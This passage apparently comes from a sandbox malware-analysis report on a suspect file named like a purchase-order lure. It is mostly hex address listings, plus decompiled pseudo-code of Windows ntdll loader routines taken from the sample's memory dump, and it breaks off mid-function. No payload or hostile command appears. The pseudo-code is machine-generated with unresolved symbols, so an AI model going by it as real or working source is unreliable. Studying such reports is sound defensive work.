                                                                                                                                                                                  0x333b8295
                                                                                                                                                                                  0x333b829a
                                                                                                                                                                                  0x333b829d
                                                                                                                                                                                  0x333b829d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b826e
                                                                                                                                                                                  0x333b8275
                                                                                                                                                                                  0x333b82a0
                                                                                                                                                                                  0x333b82a0
                                                                                                                                                                                  0x333b82a2
                                                                                                                                                                                  0x333b82b0
                                                                                                                                                                                  0x333b82b0
                                                                                                                                                                                  0x3336b25f
                                                                                                                                                                                  0x3336b25f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b25f
                                                                                                                                                                                  0x333b82a4
                                                                                                                                                                                  0x333b82a7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b82a7
                                                                                                                                                                                  0x333b826c
                                                                                                                                                                                  0x333b8247
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b8247
                                                                                                                                                                                  0x3336b233
                                                                                                                                                                                  0x3336b236
                                                                                                                                                                                  0x3336b243
                                                                                                                                                                                  0x3336b24b
                                                                                                                                                                                  0x3336b24e
                                                                                                                                                                                  0x3336b25b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b1f1
                                                                                                                                                                                  0x3336b1f1
                                                                                                                                                                                  0x3336b1f1
                                                                                                                                                                                  0x3336b1f7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b206
                                                                                                                                                                                  0x3336b20b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b20d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b20d
                                                                                                                                                                                  0x3336b3ae
                                                                                                                                                                                  0x3336b3b1
                                                                                                                                                                                  0x333b8238
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b8238
                                                                                                                                                                                  0x3336b3bb
                                                                                                                                                                                  0x3336b3c0
                                                                                                                                                                                  0x3336b3c3
                                                                                                                                                                                  0x3336b3c5
                                                                                                                                                                                  0x3336b3c7
                                                                                                                                                                                  0x3336b3c9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b3cf
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b10f
                                                                                                                                                                                  0x3336b117
                                                                                                                                                                                  0x3336b123
                                                                                                                                                                                  0x3336b129
                                                                                                                                                                                  0x3336b12d
                                                                                                                                                                                  0x3336b144
                                                                                                                                                                                  0x3336b154
                                                                                                                                                                                  0x3336b160
                                                                                                                                                                                  0x3336b32d
                                                                                                                                                                                  0x3336b32d
                                                                                                                                                                                  0x3336b332
                                                                                                                                                                                  0x333b81e4
                                                                                                                                                                                  0x3336b338
                                                                                                                                                                                  0x3336b338
                                                                                                                                                                                  0x3336b338
                                                                                                                                                                                  0x3336b332
                                                                                                                                                                                  0x3336b16a
                                                                                                                                                                                  0x3336b173
                                                                                                                                                                                  0x3336b342
                                                                                                                                                                                  0x3336b347
                                                                                                                                                                                  0x333b81ee
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b81ee
                                                                                                                                                                                  0x3336b34f
                                                                                                                                                                                  0x3336b35c
                                                                                                                                                                                  0x3336b366
                                                                                                                                                                                  0x3336b372
                                                                                                                                                                                  0x3336b381
                                                                                                                                                                                  0x3336b383
                                                                                                                                                                                  0x3336b385
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b38e
                                                                                                                                                                                  0x3336b391
                                                                                                                                                                                  0x3336b393
                                                                                                                                                                                  0x3336b39e
                                                                                                                                                                                  0x3336b39e
                                                                                                                                                                                  0x3336b39e
                                                                                                                                                                                  0x3336b3a0
                                                                                                                                                                                  0x3336b3a0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b3a0
                                                                                                                                                                                  0x3336b395
                                                                                                                                                                                  0x3336b39c
                                                                                                                                                                                  0x3336b406
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b406
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b179
                                                                                                                                                                                  0x3336b179
                                                                                                                                                                                  0x3336b179
                                                                                                                                                                                  0x3336b17c
                                                                                                                                                                                  0x3336b17e
                                                                                                                                                                                  0x3336b180
                                                                                                                                                                                  0x333b82d2
                                                                                                                                                                                  0x333b82d2
                                                                                                                                                                                  0x333b82d9
                                                                                                                                                                                  0x333b82db
                                                                                                                                                                                  0x333b82f3
                                                                                                                                                                                  0x333b82f8
                                                                                                                                                                                  0x333b82fb
                                                                                                                                                                                  0x333b8302
                                                                                                                                                                                  0x333b8308
                                                                                                                                                                                  0x333b8308
                                                                                                                                                                                  0x3336b2d8
                                                                                                                                                                                  0x3336b2dc
                                                                                                                                                                                  0x3336b2e5
                                                                                                                                                                                  0x3336b2e5
                                                                                                                                                                                  0x3336b2f2
                                                                                                                                                                                  0x3336b186
                                                                                                                                                                                  0x3336b188
                                                                                                                                                                                  0x3336b1ae
                                                                                                                                                                                  0x3336b1b2
                                                                                                                                                                                  0x3336b3dc
                                                                                                                                                                                  0x3336b3e3
                                                                                                                                                                                  0x3336b3eb
                                                                                                                                                                                  0x3336b3eb
                                                                                                                                                                                  0x3336b1be
                                                                                                                                                                                  0x3336b3f5
                                                                                                                                                                                  0x3336b3f5
                                                                                                                                                                                  0x3336b1c4
                                                                                                                                                                                  0x3336b1c4
                                                                                                                                                                                  0x3336b1c7
                                                                                                                                                                                  0x3336b1c9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b1cf
                                                                                                                                                                                  0x3336b1cf
                                                                                                                                                                                  0x3336b1d2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b1d2
                                                                                                                                                                                  0x3336b1c9
                                                                                                                                                                                  0x3336b180
                                                                                                                                                                                  0x3336b173

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                  • API String ID: 0-122214566
                                                                                                                                                                                  • Opcode ID: 8e67bbb454b8bb4cb51fcbf99a74e5d0aa36f6df051479a8fe84829d68a9714f
                                                                                                                                                                                  • Instruction ID: 176e3e0fac2f5ea79a335c16543ffef717a445f8cbd43baf77c72430796d0982
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e67bbb454b8bb4cb51fcbf99a74e5d0aa36f6df051479a8fe84829d68a9714f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 23C10375E01355AFEB048F65CCD0BBE77A4AF45308F54C069E842EF699EBB48844C790
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3338631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 81%
                                                                                                                                                                                  			E3338631F(intOrPtr __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _t71;
				void* _t73;
				signed int _t77;
				signed int _t79;
				char* _t84;
				intOrPtr _t85;
				signed int _t86;
				signed int _t88;
				signed char* _t89;
				void* _t99;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed char _t109;
				void* _t111;
				intOrPtr _t112;
				intOrPtr _t116;
				intOrPtr _t124;
				intOrPtr _t127;
				signed char _t130;
				signed int _t132;
				signed int _t133;
				intOrPtr _t136;
				void* _t138;
				signed int* _t140;
				signed short _t141;
				signed int _t145;
				void* _t147;
				signed int _t148;
				signed int _t149;
				void* _t151;
				void* _t153;

				_push(__esi);
				_push(__edi);
				_t145 = __edx;
				_t136 = __ecx;
				if( *0x334468d4 == 0) {
					E333D1419();
				}
				_t71 =  *[fs:0x18];
				if(( *(_t71 + 0xfca) & 0x00004000) != 0) {
					return _t71;
				} else {
					_t116 = _t136;
					_t132 = _t145;
					_pop(_t138);
					_pop(_t147);
					_push(0x30);
					_push(0x3342c780);
					E333A7BE4(_t111, _t138, _t147);
					 *(_t151 - 0x28) = _t132;
					 *((intOrPtr*)(_t151 - 0x20)) = _t116;
					_t112 =  *[fs:0x18];
					 *((intOrPtr*)(_t151 - 0x30)) = _t112;
					_t148 = 0;
					 *(_t151 - 0x24) = 0;
					while(1) {
						L6:
						_t133 = 0x2000;
						_t118 = 1;
						_t73 = 0;
						asm("lock cmpxchg [edi], ecx");
						if(0 != 1 || ( *(_t112 + 0xfca) & 0x00002000) != 0) {
							goto L8;
						}
						L44:
						_t104 =  *0x33445d50; // 0x50
						__eflags = _t104;
						if(_t104 == 0) {
							L51:
							 *((intOrPtr*)(_t151 - 0x40)) = 0xfffb6c20;
							_t55 = _t151 - 0x3c;
							 *_t55 =  *(_t151 - 0x3c) | 0xffffffff;
							__eflags =  *_t55;
							while(1) {
								__eflags =  *0x33445db0 - 1;
								if(__eflags != 0) {
									goto L6;
								}
								_push(_t151 - 0x40);
								_push(_t148);
								_t106 = E33392CF0();
								__eflags = _t106;
								if(_t106 < 0) {
									_t130 =  *0x334437c0; // 0x0
									__eflags = _t130 & 0x00000003;
									if((_t130 & 0x00000003) != 0) {
										E333CE692("minkernel\\ntdll\\ldrinit.c", 0x615, "_LdrpInitialize", "true", "Delaying execution failed with status 0x%08lx\n", _t106);
										_t153 = _t153 + 0x18;
										_t130 =  *0x334437c0; // 0x0
									}
									__eflags = _t130 & 0x00000040;
									if((_t130 & 0x00000040) != 0) {
										asm("int3");
									}
								}
							}
							continue;
						} else {
							_push(_t148);
							_push(_t148);
							_push(_t104);
							_t108 = E333929D0();
							_t118 = _t108;
							__eflags = _t108;
							if(__eflags < 0) {
								_t109 =  *0x334437c0; // 0x0
								__eflags = _t109 & 0x00000003;
								if((_t109 & 0x00000003) != 0) {
									E333CE692("minkernel\\ntdll\\ldrinit.c", 0x604, "_LdrpInitialize", "true", "NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop\n", _t118);
									_t153 = _t153 + 0x18;
									_t109 =  *0x334437c0; // 0x0
								}
								__eflags = _t109 & 0x00000040;
								if((_t109 & 0x00000040) != 0) {
									asm("int3");
								}
								goto L51;
							} else {
								_t73 =  *0x33445db0; // 0x2
							}
						}
						L8:
						_t140 =  *(_t112 + 0x30);
						if(_t73 == 0) {
							_push(_t148);
							_push(_t148);
							_push(_t148);
							_push(0x1f0003);
							_push(0x33445d50);
							E33392E30();
							 *(_t112 + 0xfca) =  *(_t112 + 0xfca) | 0x00000020;
							_t140[0x28] = 0x33443390;
							 *0x334465f4 = _t148;
							 *(_t151 - 0x34) =  &(_t140[0xa]);
							asm("lock bts dword [eax], 0x1");
							_t149 = E333D4F99();
							__eflags = _t149;
							if(_t149 >= 0) {
								 *(_t151 - 4) =  *(_t151 - 4) & 0x00000000;
								_t77 = _t140[4];
								 *(_t151 - 0x38) = _t77;
								__eflags =  *(_t77 + 8);
								if(__eflags < 0) {
									 *0x33445d70 = 1;
									 *0x33445d08 = 1;
								}
								_t133 =  *(_t151 - 0x28);
								_t149 = L333CA3F0(_t112,  *((intOrPtr*)(_t151 - 0x20)), _t133, _t140, _t149, __eflags);
								 *(_t151 - 0x1c) = _t149;
								__eflags = _t149;
								if(_t149 < 0) {
									_t79 =  *0x334437c0; // 0x0
									__eflags = _t79 & 0x00000003;
									if((_t79 & 0x00000003) != 0) {
										E333CE692("minkernel\\ntdll\\ldrinit.c", 0x678, "_LdrpInitialize", 0, "Process initialization failed with status 0x%08lx\n", _t149);
										_t79 =  *0x334437c0; // 0x0
									}
									__eflags = _t79 & 0x00000010;
									if((_t79 & 0x00000010) != 0) {
										asm("int3");
									}
									 *(_t151 - 4) = 0xfffffffe;
									goto L14;
								} else {
									__eflags =  *0x334468d0;
									if( *0x334468d0 != 0) {
										 *(_t151 - 4) = 0xfffffffe;
										goto L18;
									} else {
										_t124 =  *0x33445b24; // 0x2fe2d40
										_t24 = _t124 + 0x24; // 0x2fe2d64
										_t133 = _t24;
										_t25 = _t124 + 0x18; // 0x400000
										E3336DF36( *_t25, _t133, 0x14ae);
										_t126 = _t140[0x82];
										__eflags = _t140[0x82];
										if(__eflags != 0) {
											_t149 = E333D3BA3(_t112, _t126, _t140, _t149, __eflags);
											 *(_t151 - 0x1c) = _t149;
										}
										 *(_t151 - 4) = 0xfffffffe;
										_t141 = 0x2000;
										 *0x334465f4 = 3;
										asm("lock btr dword [eax], 0x1");
										_t127 =  *0x3344670c; // 0x2fe3310
										E333864BE(_t127);
										__eflags = _t149;
										if(_t149 < 0) {
											goto L67;
										} else {
											_t79 = E3338648A(_t133);
											goto L15;
										}
									}
								}
							} else {
								_t79 =  *0x334437c0; // 0x0
								__eflags = _t79 & 0x00000003;
								if((_t79 & 0x00000003) != 0) {
									E333CE692("minkernel\\ntdll\\ldrinit.c", 0x660, "_LdrpInitialize", 0, "LDR:MRDATA: Process initialization failed with status 0x%08lx\n", _t149);
									_t79 =  *0x334437c0; // 0x0
								}
								__eflags = _t79 & 0x00000010;
								if((_t79 & 0x00000010) != 0) {
									asm("int3");
								}
								goto L14;
							}
						} else {
							 *(_t151 - 0x1c) = _t148;
							if( *0x334468d0 != 0) {
								L18:
								 *[fs:0x0] =  *((intOrPtr*)(_t151 - 0x10));
								return _t79;
							} else {
								if( *_t140 != 0) {
									_t148 = 0;
									 *0x33445d50 = 0;
									_t118 = 1;
									_t99 = 2;
									_t133 = 0x33445db0;
									asm("lock cmpxchg [edx], ecx");
									__eflags = _t99 - 2;
									if(_t99 == 2) {
										__eflags =  *_t140;
										if( *_t140 == 0) {
											_t149 =  *(_t151 - 0x1c);
											goto L62;
										} else {
											_t79 = E333D1B93();
											_t149 = _t79;
											__eflags = _t149;
											if(__eflags >= 0) {
												L62:
												_t79 = E3338648A(_t133);
											} else {
											}
											goto L11;
										}
										goto L15;
									} else {
										goto L44;
									}
								} else {
									L11:
									if(( *(_t112 + 0xfca) & 0x00000040) == 0) {
										_t166 =  *0x33445a85;
										if( *0x33445a85 != 0) {
											_t140 = 0x334467b4;
											L333553C0(0x334467b4);
											while(1) {
												__eflags =  *0x33445a85;
												if( *0x33445a85 == 0) {
													break;
												}
												L333621D0(0x334467b8, _t140, 0, "true");
											}
											E333552F0(_t118, _t140);
										}
										_t79 = E3336DA59(_t112,  *((intOrPtr*)(_t151 - 0x20)), _t140, _t149, _t166);
									}
									L14:
									_t141 = 0x2000;
									L15:
									if(_t149 < 0) {
										L67:
										_t120 = _t149;
										E333D1D5E(_t149);
										_push(_t149);
										_push(0xffffffff);
										_t79 = L33392C70();
										__eflags =  *(_t151 - 0x24);
										if( *(_t151 - 0x24) != 0) {
											goto L18;
										} else {
											E333A8AA0(_t120, _t133, _t149);
											asm("int3");
											_t84 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
											__eflags =  *_t84;
											if( *_t84 != 0) {
												_t85 =  *[fs:0x30];
												__eflags =  *(_t85 + 0x240) & 0x00000004;
												if(( *(_t85 + 0x240) & 0x00000004) != 0) {
													_t88 = L33363C40();
													__eflags = _t88;
													if(_t88 == 0) {
														_t89 = 0x7ffe0385;
													} else {
														_t89 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
													}
													__eflags =  *_t89 & 0x00000020;
													if(( *_t89 & 0x00000020) != 0) {
														E333D0227(0x1484, _t133 | 0xffffffff, _t133 | 0xffffffff, _t133 | 0xffffffff, 0, 0);
													}
												}
											}
											asm("lock inc dword [0x33445db0]");
											_t86 =  *0x33445d50; // 0x50
											__eflags = _t86;
											if(_t86 != 0) {
												_push(0);
												_push(_t86);
												return E33392A70();
											}
											return _t86;
										}
									} else {
										if(( *(_t112 + 0xfca) & _t141) == 0) {
											_t79 = E333945B0();
										}
										goto L18;
									}
								}
							}
						}
						goto L76;
					}
				}
				L76:
			}



































                                                                                                                                                                                  0x33386326
                                                                                                                                                                                  0x33386327
                                                                                                                                                                                  0x33386328
                                                                                                                                                                                  0x3338632a
                                                                                                                                                                                  0x3338632c
                                                                                                                                                                                  0x3338634d
                                                                                                                                                                                  0x3338634d
                                                                                                                                                                                  0x3338632e
                                                                                                                                                                                  0x33386340
                                                                                                                                                                                  0x33386356
                                                                                                                                                                                  0x33386342
                                                                                                                                                                                  0x33386342
                                                                                                                                                                                  0x33386344
                                                                                                                                                                                  0x33386346
                                                                                                                                                                                  0x33386347
                                                                                                                                                                                  0x33386357
                                                                                                                                                                                  0x33386359
                                                                                                                                                                                  0x3338635e
                                                                                                                                                                                  0x33386363
                                                                                                                                                                                  0x33386366
                                                                                                                                                                                  0x33386369
                                                                                                                                                                                  0x33386370
                                                                                                                                                                                  0x33386373
                                                                                                                                                                                  0x33386375
                                                                                                                                                                                  0x3338637d
                                                                                                                                                                                  0x3338637d
                                                                                                                                                                                  0x3338637d
                                                                                                                                                                                  0x33386384
                                                                                                                                                                                  0x33386385
                                                                                                                                                                                  0x33386387
                                                                                                                                                                                  0x3338638e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c3fde
                                                                                                                                                                                  0x333c3fde
                                                                                                                                                                                  0x333c3fe3
                                                                                                                                                                                  0x333c3fe5
                                                                                                                                                                                  0x333c4031
                                                                                                                                                                                  0x333c4031
                                                                                                                                                                                  0x333c4038
                                                                                                                                                                                  0x333c4038
                                                                                                                                                                                  0x333c4038
                                                                                                                                                                                  0x333c403c
                                                                                                                                                                                  0x333c403c
                                                                                                                                                                                  0x333c4043
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c404c
                                                                                                                                                                                  0x333c404d
                                                                                                                                                                                  0x333c404e
                                                                                                                                                                                  0x333c4053
                                                                                                                                                                                  0x333c4055
                                                                                                                                                                                  0x333c4057
                                                                                                                                                                                  0x333c405d
                                                                                                                                                                                  0x333c4060
                                                                                                                                                                                  0x333c4079
                                                                                                                                                                                  0x333c407e
                                                                                                                                                                                  0x333c4081
                                                                                                                                                                                  0x333c4081
                                                                                                                                                                                  0x333c4087
                                                                                                                                                                                  0x333c408a
                                                                                                                                                                                  0x333c408c
                                                                                                                                                                                  0x333c408c
                                                                                                                                                                                  0x333c408a
                                                                                                                                                                                  0x333c4055
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c3fe7
                                                                                                                                                                                  0x333c3fe7
                                                                                                                                                                                  0x333c3fe8
                                                                                                                                                                                  0x333c3fe9
                                                                                                                                                                                  0x333c3fea
                                                                                                                                                                                  0x333c3fef
                                                                                                                                                                                  0x333c3ff1
                                                                                                                                                                                  0x333c3ff3
                                                                                                                                                                                  0x333c3fff
                                                                                                                                                                                  0x333c4004
                                                                                                                                                                                  0x333c4006
                                                                                                                                                                                  0x333c401f
                                                                                                                                                                                  0x333c4024
                                                                                                                                                                                  0x333c4027
                                                                                                                                                                                  0x333c4027
                                                                                                                                                                                  0x333c402c
                                                                                                                                                                                  0x333c402e
                                                                                                                                                                                  0x333c4030
                                                                                                                                                                                  0x333c4030
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c3ff5
                                                                                                                                                                                  0x333c3ff5
                                                                                                                                                                                  0x333c3ff5
                                                                                                                                                                                  0x333c3ff3
                                                                                                                                                                                  0x3338639d
                                                                                                                                                                                  0x3338639d
                                                                                                                                                                                  0x333863a2
                                                                                                                                                                                  0x333c3e99
                                                                                                                                                                                  0x333c3e9a
                                                                                                                                                                                  0x333c3e9b
                                                                                                                                                                                  0x333c3e9c
                                                                                                                                                                                  0x333c3ea1
                                                                                                                                                                                  0x333c3ea6
                                                                                                                                                                                  0x333c3eab
                                                                                                                                                                                  0x333c3eb3
                                                                                                                                                                                  0x333c3ebd
                                                                                                                                                                                  0x333c3ec6
                                                                                                                                                                                  0x333c3ec9
                                                                                                                                                                                  0x333c3ed3
                                                                                                                                                                                  0x333c3ed5
                                                                                                                                                                                  0x333c3ed7
                                                                                                                                                                                  0x333c3f14
                                                                                                                                                                                  0x333c3f18
                                                                                                                                                                                  0x333c3f1b
                                                                                                                                                                                  0x333c3f1e
                                                                                                                                                                                  0x333c3f22
                                                                                                                                                                                  0x333c3f28
                                                                                                                                                                                  0x333c3f2f
                                                                                                                                                                                  0x333c3f2f
                                                                                                                                                                                  0x33386406
                                                                                                                                                                                  0x33386411
                                                                                                                                                                                  0x33386413
                                                                                                                                                                                  0x33386416
                                                                                                                                                                                  0x33386418
                                                                                                                                                                                  0x333c3f3b
                                                                                                                                                                                  0x333c3f40
                                                                                                                                                                                  0x333c3f42
                                                                                                                                                                                  0x333c3f5b
                                                                                                                                                                                  0x333c3f63
                                                                                                                                                                                  0x333c3f63
                                                                                                                                                                                  0x333c3f68
                                                                                                                                                                                  0x333c3f6a
                                                                                                                                                                                  0x333c3f6c
                                                                                                                                                                                  0x333c3f6c
                                                                                                                                                                                  0x333c3f6d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338641e
                                                                                                                                                                                  0x3338641e
                                                                                                                                                                                  0x33386425
                                                                                                                                                                                  0x333c3f79
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338642b
                                                                                                                                                                                  0x33386430
                                                                                                                                                                                  0x33386436
                                                                                                                                                                                  0x33386436
                                                                                                                                                                                  0x33386439
                                                                                                                                                                                  0x3338643c
                                                                                                                                                                                  0x33386441
                                                                                                                                                                                  0x33386447
                                                                                                                                                                                  0x33386449
                                                                                                                                                                                  0x333c3f8a
                                                                                                                                                                                  0x333c3f8c
                                                                                                                                                                                  0x333c3f8c
                                                                                                                                                                                  0x3338644f
                                                                                                                                                                                  0x33386456
                                                                                                                                                                                  0x3338645b
                                                                                                                                                                                  0x33386468
                                                                                                                                                                                  0x3338646d
                                                                                                                                                                                  0x33386473
                                                                                                                                                                                  0x33386478
                                                                                                                                                                                  0x3338647a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33386480
                                                                                                                                                                                  0x33386480
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33386480
                                                                                                                                                                                  0x3338647a
                                                                                                                                                                                  0x33386425
                                                                                                                                                                                  0x333c3ed9
                                                                                                                                                                                  0x333c3ed9
                                                                                                                                                                                  0x333c3ede
                                                                                                                                                                                  0x333c3ee0
                                                                                                                                                                                  0x333c3ef9
                                                                                                                                                                                  0x333c3f01
                                                                                                                                                                                  0x333c3f01
                                                                                                                                                                                  0x333c3f06
                                                                                                                                                                                  0x333c3f08
                                                                                                                                                                                  0x333c3f0e
                                                                                                                                                                                  0x333c3f0e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c3f08
                                                                                                                                                                                  0x333863a8
                                                                                                                                                                                  0x333863a8
                                                                                                                                                                                  0x333863b2
                                                                                                                                                                                  0x333863f6
                                                                                                                                                                                  0x333863f9
                                                                                                                                                                                  0x33386405
                                                                                                                                                                                  0x333863b4
                                                                                                                                                                                  0x333863b7
                                                                                                                                                                                  0x333c3fbc
                                                                                                                                                                                  0x333c3fbe
                                                                                                                                                                                  0x333c3fc6
                                                                                                                                                                                  0x333c3fc9
                                                                                                                                                                                  0x333c3fca
                                                                                                                                                                                  0x333c3fcf
                                                                                                                                                                                  0x333c3fd3
                                                                                                                                                                                  0x333c3fd6
                                                                                                                                                                                  0x333c4091
                                                                                                                                                                                  0x333c4093
                                                                                                                                                                                  0x333c40a5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c4095
                                                                                                                                                                                  0x333c4095
                                                                                                                                                                                  0x333c409a
                                                                                                                                                                                  0x333c409c
                                                                                                                                                                                  0x333c409e
                                                                                                                                                                                  0x333c40a8
                                                                                                                                                                                  0x333c40a8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c40a0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c409e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c3fdc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c3fdc
                                                                                                                                                                                  0x333863bd
                                                                                                                                                                                  0x333863bd
                                                                                                                                                                                  0x333863c4
                                                                                                                                                                                  0x333863c6
                                                                                                                                                                                  0x333863cd
                                                                                                                                                                                  0x333c40b2
                                                                                                                                                                                  0x333c40b8
                                                                                                                                                                                  0x333c40bd
                                                                                                                                                                                  0x333c40bd
                                                                                                                                                                                  0x333c40c4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c40d0
                                                                                                                                                                                  0x333c40d0
                                                                                                                                                                                  0x333c40d8
                                                                                                                                                                                  0x333c40d8
                                                                                                                                                                                  0x333863d6
                                                                                                                                                                                  0x333863d6
                                                                                                                                                                                  0x333863db
                                                                                                                                                                                  0x333863db
                                                                                                                                                                                  0x333863e0
                                                                                                                                                                                  0x333863e2
                                                                                                                                                                                  0x333c40e2
                                                                                                                                                                                  0x333c40e2
                                                                                                                                                                                  0x333c40e4
                                                                                                                                                                                  0x333c40e9
                                                                                                                                                                                  0x333c40ea
                                                                                                                                                                                  0x333c40ec
                                                                                                                                                                                  0x333c40f1
                                                                                                                                                                                  0x333c40f5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c40fb
                                                                                                                                                                                  0x333c40fc
                                                                                                                                                                                  0x333c4101
                                                                                                                                                                                  0x333c410b
                                                                                                                                                                                  0x3338649c
                                                                                                                                                                                  0x3338649f
                                                                                                                                                                                  0x333c4115
                                                                                                                                                                                  0x333c411b
                                                                                                                                                                                  0x333c4122
                                                                                                                                                                                  0x333c4128
                                                                                                                                                                                  0x333c412d
                                                                                                                                                                                  0x333c412f
                                                                                                                                                                                  0x333c4141
                                                                                                                                                                                  0x333c4131
                                                                                                                                                                                  0x333c413a
                                                                                                                                                                                  0x333c413a
                                                                                                                                                                                  0x333c4146
                                                                                                                                                                                  0x333c4149
                                                                                                                                                                                  0x333c415d
                                                                                                                                                                                  0x333c415d
                                                                                                                                                                                  0x333c4149
                                                                                                                                                                                  0x333c4122
                                                                                                                                                                                  0x333864a5
                                                                                                                                                                                  0x333864ac
                                                                                                                                                                                  0x333864b1
                                                                                                                                                                                  0x333864b3
                                                                                                                                                                                  0x333864b5
                                                                                                                                                                                  0x333864b7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333864b8
                                                                                                                                                                                  0x333864bd
                                                                                                                                                                                  0x333864bd
                                                                                                                                                                                  0x333863e8
                                                                                                                                                                                  0x333863ef
                                                                                                                                                                                  0x333863f1
                                                                                                                                                                                  0x333863f1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333863ef
                                                                                                                                                                                  0x333863e2
                                                                                                                                                                                  0x333863b7
                                                                                                                                                                                  0x333863b2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333863a2
                                                                                                                                                                                  0x3338637d
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-792281065
                                                                                                                                                                                  • Opcode ID: b74656d04be865e1f28f80220f3b0e2e7ad766e9d458de648f0629dbf50e81d2
                                                                                                                                                                                  • Instruction ID: 255291a1fb8c36b99e8c5d4b19e67579a33a00a91c0c009ee20e23e7ac12c91c
                                                                                                                                                                                  • Opcode Fuzzy Hash: b74656d04be865e1f28f80220f3b0e2e7ad766e9d458de648f0629dbf50e81d2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 009135B0E863589FEB15DF10CC84B9977E8AF01B64F04C168E641BB691DBB89C46CB91
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33382594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                                                                  			E33382594(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr _a16) {
				void* _v8;
